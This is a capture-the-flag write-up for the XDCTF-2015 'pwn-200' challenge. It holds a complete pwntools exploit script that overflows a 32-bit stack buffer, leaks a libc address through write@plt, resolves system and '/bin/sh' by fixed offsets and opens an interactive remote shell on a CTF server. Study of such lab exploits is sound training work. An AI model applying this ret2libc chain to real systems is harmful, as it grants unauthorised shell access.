pwn-200

题目来源: XDCTF-2015

 

栈溢出,无canary,无PIE

DynELF 不知道怎么回事查不到 system 函数，那就先泄露地址，再直接查 libc-database

exp如下:

from pwn import *

# Target connection (the commented process() line is the local-run variant).
#io = process('./pwn-200')
io = remote(host='111.200.241.244', port=59980)

# Uncomment to trace every send/recv while debugging.
#context.log_level = 'debug'

# Fixed addresses taken from the non-PIE binary (writeup: no canary, no PIE),
# so they are valid as-is without any leak.
main_addr = 0x80484BE   # used as the return address after write/system in the chains below
write_plt = 0x80483C0   # write@plt: the leak primitive
read_plt = 0x8048390    # read@plt (not referenced below)
goal_addr = 0x804a100   # not referenced below
write_got = 0x804A010   # write's GOT slot; its contents are write's address inside libc

def leak(address):
    """Return the 4 bytes stored at *address* in the target process.

    The 112-byte padding reaches the saved return address (per the writeup's
    stack overflow); the chain then calls write@plt with arguments
    (1, address, 4) and returns into main so the service can be driven again.
    The banner is consumed first so the payload lands on the next read.
    Relies on the module-level ``io``, ``write_plt`` and ``main_addr``.
    """
    chain = [write_plt, main_addr, 1, address, 4]
    payload = b'a' * 112 + b''.join(p32(word) for word in chain)
    io.recvuntil('Welcome to XDCTF2015~!\n')
    io.send(payload)
    return io.recv(4)

# DynELF lookup did not work here (see the writeup), so write's libc address
# is leaked from its GOT slot and resolved against libc-database offsets.
# The three offsets below belong to the remote libc build only.
#d = DynELF(leak, elf = ELF('./pwn-200'))
#system_addr = d.lookup('system', 'libc')
write_addr = u32(leak(write_got))
info('write_addr: %#x' % write_addr)
libc_base = write_addr - 0xd43c0          # offset of write in that libc
info('libc_base: %#x' % libc_base)
system_addr = libc_base + 0x3a940         # offset of system
info('system_addr: %#x' % system_addr)
binsh_addr = libc_base + 0x15902b         # presumably the "/bin/sh" string, per its name
info('binsh_addr: %#x' % binsh_addr)

# Final chain: same 112-byte padding, then system with main as its return
# address and binsh_addr as its single argument.
final_chain = b''.join(p32(word) for word in (system_addr, main_addr, binsh_addr))
io.recvuntil('Welcome to XDCTF2015~!\n')
io.send(b'a' * 112 + final_chain)

io.interactive()

 

posted @ 2021-09-21 15:34  hktk1643